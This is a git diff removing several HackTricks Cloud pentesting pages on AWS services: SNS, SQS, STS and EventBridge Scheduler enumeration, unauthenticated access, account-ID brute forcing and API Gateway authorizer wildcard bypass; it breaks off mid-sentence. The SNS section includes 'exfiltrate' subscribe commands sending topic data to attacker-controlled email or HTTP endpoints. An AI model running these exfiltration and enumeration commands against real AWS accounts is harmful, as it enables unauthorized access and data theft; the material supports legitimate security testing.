ELBs -* Certificate checks for CloudFront -* IAM access key rotation (90 days) -* Exposure of access keys (e.g., on GitHub) -* Public visibility of EBS or RDS snapshots -* Weak or absent IAM password policies - -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. - -## **References** - -* [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md deleted file mode 100644 index 2c3753a36..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md +++ /dev/null @@ -1,106 +0,0 @@ -# AWS - SNS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. - -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. - -### **Difference with SQS** - -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. - -### **Enumeration** - -```bash -# Get topics & subscriptions -aws sns list-topics -aws sns list-subscriptions -aws sns list-subscriptions-by-topic --topic-arn - -# Check privescs & post-exploitation -aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt - -# Exfiltrate through email -## You will receive an email to confirm the subscription -aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com - -# Exfiltrate through web server -## You will receive an initial request with a URL in the field "SubscribeURL" -## that you need to access to confirm the subscription -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="danger" %} -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). - -Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. -{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md" %} -[aws-sns-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sns-privesc.md" %} -[aws-sns-privesc.md](../aws-privilege-escalation/aws-sns-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sns-post-exploitation.md" %} -[aws-sns-post-exploitation.md](../aws-post-exploitation/aws-sns-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sns-persistence.md" %} -[aws-sns-persistence.md](../aws-persistence/aws-sns-persistence.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md deleted file mode 100644 index e4c425669..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - SQS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. - -### Enumeration - -```bash -# Get queues info -aws sqs list-queues -aws sqs get-queue-attributes --queue-url --attribute-names All - -# More about this in privesc & post-exploitation -aws sqs receive-message --queue-url - -aws sqs send-message --queue-url --message-body -``` - -{% hint style="danger" %} -Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. -{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md" %} -[aws-sqs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sqs-privesc.md" %} -[aws-sqs-privesc.md](../aws-privilege-escalation/aws-sqs-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sqs-post-exploitation.md" %} -[aws-sqs-post-exploitation.md](../aws-post-exploitation/aws-sqs-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sqs-persistence.md" %} -[aws-sqs-persistence.md](../aws-persistence/aws-sqs-persistence.md) -{% endcontent-ref %} - -## References - -* https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md deleted file mode 100644 index ad755d115..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ /dev/null @@ -1,126 +0,0 @@ -# AWS - STS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## STS - -**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). - -Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. - -### Assume Role Impersonation - -The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. - -For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. - -#### Assume Role Logic - -In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::role/priv-role" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). - -However, if a role is allowing an account to assume it, like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. - -If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). - -### Enumeration - -```bash -# Get basic info of the creds -aws sts get-caller-identity -aws sts get-access-key-info --access-key-id - -# Get CLI a session token with current creds -## Using CLI creds -## You cannot get session creds using session creds -aws sts get-session-token -## MFA -aws sts get-session-token --serial-number --token-code -``` - -### Privesc - -In the following page you can check how to **abuse STS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-sts-privesc.md" %} -[aws-sts-privesc.md](../aws-privilege-escalation/aws-sts-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sts-post-exploitation.md" %} -[aws-sts-post-exploitation.md](../aws-post-exploitation/aws-sts-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-sts-persistence.md" %} -[aws-sts-persistence.md](../aws-persistence/aws-sts-persistence.md) -{% endcontent-ref %} - -## References - -* [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm\_source=pocket\_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md deleted file mode 100644 index c90be6f1d..000000000 --- a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ /dev/null @@ -1,107 +0,0 @@ -# AWS - EventBridge Scheduler Enum - -## EventBridge Scheduler - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EventBridge Scheduler - -**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. - -There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." - -### Types of Schedules - -Types of Schedules in EventBridge Scheduler: - -1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. -2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. -3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. - -Two Mechanisms for Handling Failed Events: - -1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. -2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. - -### Targets - -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. - -**Templated targets** support the following services: - -* CodeBuild – StartBuild -* CodePipeline – StartPipelineExecution -* Amazon ECS – RunTask - * Parameters: EcsParameters -* EventBridge – PutEvents - * Parameters: EventBridgeParameters -* Amazon Inspector – StartAssessmentRun -* Kinesis – PutRecord - * Parameters: KinesisParameters -* Firehose – PutRecord -* Lambda – Invoke -* SageMaker – StartPipelineExecution - * Parameters: SageMakerPipelineParameters -* Amazon SNS – Publish -* Amazon SQS – SendMessage - * Parameters: SqsParameters -* Step Functions – StartExecution - -### Enumeration - -```bash -# List all EventBridge Scheduler schedules -aws scheduler list-schedules - -# List all EventBridge Scheduler schedule groups -aws scheduler list-schedule-groups - -# Describe a specific schedule to retrieve more details -aws scheduler get-schedule --name - -# Describe a specific schedule group -aws scheduler get-schedule-group --name - -# List tags for a specific schedule (helpful in identifying any custom tags or permissions) -aws scheduler list-tags-for-resource --resource-arn -``` - -### Privesc - -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/eventbridgescheduler-privesc.md" %} -[eventbridgescheduler-privesc.md](../aws-privilege-escalation/eventbridgescheduler-privesc.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md deleted file mode 100644 index c999e66ce..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - Unauthenticated Enum & Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Credentials Leaks - -A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ -Some useful **tools**: - -* [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) -* [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) -* [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) - -## AWS Unauthenticated Enum & Access - -There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: - -* [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) -* [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -* [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) -* [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -* [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) -* [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) -* [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) -* [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) -* [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) -* [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) -* [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) -* [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) -* [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) -* [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) -* [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) -* [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) -* [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) -* [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) - -## Cross Account Attacks - -In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. - -During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: - -![](<../../../.gitbook/assets/image (260).png>) - -Other services found vulnerable: - -* AWS Config -* Serverless repository - -## Tools - -* [**cloud\_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md deleted file mode 100644 index e3a79d5b1..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - Accounts Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Account IDs - -If you have a target there are ways to try to identify account IDs of accounts related to the target. - -### Brute-Force - -You create a list of potential account IDs and aliases and check them - -```bash -# Check if an account ID exists -curl -v https://.signin.aws.amazon.com -## If response is 404 it doesn't, if 200, it exists -## It also works from account aliases -curl -v https://vodafone-uk2.signin.aws.amazon.com -``` - -You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). - -### OSINT - -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. - -### Marketplace - -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. - -### Snapshots - -* Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -* RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -* Public AMIs (EC2 -> AMIs -> Public images) - -### Errors - -Many AWS error messages (even access denied) will give that information. - -## References - -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md deleted file mode 100644 index 24abdac6e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# AWS - API Gateway Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### API Invoke bypass - -According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Permission", - "Action": [ - "execute-api:Execution-operation" - ], - "Resource": [ - "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" - ] - } - ] -} -``` - -The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. - -Some examples: - -* A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. - -{% hint style="warning" %} -Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ -So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ -Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. -{% endhint %} - -You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. - -For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). - -### IAM Policy Injection - -In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or 